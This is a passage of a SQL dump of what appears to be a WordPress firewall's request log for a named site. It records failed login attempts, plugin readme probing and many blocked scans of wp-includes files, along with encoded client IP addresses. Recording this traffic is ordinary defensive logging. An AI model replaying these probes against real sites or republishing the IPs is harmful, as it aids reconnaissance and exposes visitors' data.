Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134927,1700423978.369928,1700423978.340800,0x00000000000000000000FFFF3E8D26D7,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134941,0.000000,1700441426.771785,0x00000000000000000000FFFF36EB0A6B,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134942,1700443448.903497,1700443448.862900,0x00000000000000000000FFFFC3141064,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/woocommerce-payments/readme.txt','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wYXltZW50cy9yZWFkbWUudHh0\",\"category\":\"brute-force\",\"ssl\":1}'),(134938,1700437669.616666,1700437669.592700,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134928,1700423978.369724,1700423978.340800,0x00000000000000000000FFFF3E8D26D7,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134929,0.000000,1700425271.165365,0x00000000000000000000FFFFB33C9378,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134930,0.000000,1700425271.937640,0x00000000000000000000FFFFB33C9378,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134931,0.000000,1700425272.740722,0x00000000000000000000FFFFB33C9378,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134932,0.000000,1700425273.542307,0x00000000000000000000FFFFB33C9378,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134933,0.000000,1700431516.210351,0x00000000000000000000FFFF36EB0A6B,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134934,0.000000,1700433123.205533,0x00000000000000000000FFFF36EB0A6B,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134935,0.000000,1700435114.228162,0x00000000000000000000FFFF36EB0A6B,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134936,0.000000,1700437189.587190,0x00000000000000000000FFFF36EB0A6B,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134937,1700437669.617153,1700437669.592700,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133621,1699888531.910168,1699888531.901600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/feed-atom.php','http://eckankar-colorado.org/wp-includes/feed-atom.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZlZWQtYXRvbS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133622,1699888531.557495,1699888531.548200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/feed-atom-comments.php','http://eckankar-colorado.org/wp-includes/feed-atom-comments.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZlZWQtYXRvbS1jb21tZW50cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133623,1699888531.219196,1699888531.210600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/error-protection.php','http://eckankar-colorado.org/wp-includes/error-protection.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Vycm9yLXByb3RlY3Rpb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133624,1699888530.881002,1699888530.872400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/embed.php','http://eckankar-colorado.org/wp-includes/embed.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2VtYmVkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133625,1699888530.540417,1699888530.531200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/embed-template.php','http://eckankar-colorado.org/wp-includes/embed-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2VtYmVkLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133626,1699888530.199512,1699888530.190800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/deprecated.php','http://eckankar-colorado.org/wp-includes/deprecated.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2RlcHJlY2F0ZWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133627,1699888529.818345,1699888529.809800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/default-widgets.php','http://eckankar-colorado.org/wp-includes/default-widgets.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2RlZmF1bHQtd2lkZ2V0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133628,1699888529.477578,1699888529.468800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/default-filters.php','http://eckankar-colorado.org/wp-includes/default-filters.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2RlZmF1bHQtZmlsdGVycy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133629,1699888529.120606,1699888529.112000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/default-constants.php','http://eckankar-colorado.org/wp-includes/default-constants.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2RlZmF1bHQtY29uc3RhbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133630,1699888528.769958,1699888528.761500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/date.php','http://eckankar-colorado.org/wp-includes/date.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2RhdGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133631,1699888528.420260,1699888528.398900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/cron.php','http://eckankar-colorado.org/wp-includes/cron.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Nyb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133632,1699888528.068736,1699888528.059900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/compat.php','http://eckankar-colorado.org/wp-includes/compat.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NvbXBhdC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133633,1699888527.731844,1699888527.723200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/comment.php','http://eckankar-colorado.org/wp-includes/comment.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NvbW1lbnQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133634,1699888527.186364,1699888527.176900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/comment-template.php','http://eckankar-colorado.org/wp-includes/comment-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NvbW1lbnQtdGVtcGxhdGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133635,1699888526.805375,1699888526.796200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class.wp-styles.php','http://eckankar-colorado.org/wp-includes/class.wp-styles.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLndwLXN0eWxlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133636,1699888526.381844,1699888526.367700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class.wp-scripts.php','http://eckankar-colorado.org/wp-includes/class.wp-scripts.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLndwLXNjcmlwdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133637,1699888526.009964,1699888526.001100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class.wp-dependencies.php','http://eckankar-colorado.org/wp-includes/class.wp-dependencies.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLndwLWRlcGVuZGVuY2llcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133638,1699888525.668409,1699888525.659100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wpdb.php','http://eckankar-colorado.org/wp-includes/class-wpdb.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwZGIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133639,1699888525.289558,1699888525.280200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp.php','http://eckankar-colorado.org/wp-includes/class-wp.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133640,1699888524.949115,1699888524.940400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-xmlrpc-server.php','http://eckankar-colorado.org/wp-includes/class-wp-xmlrpc-server.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 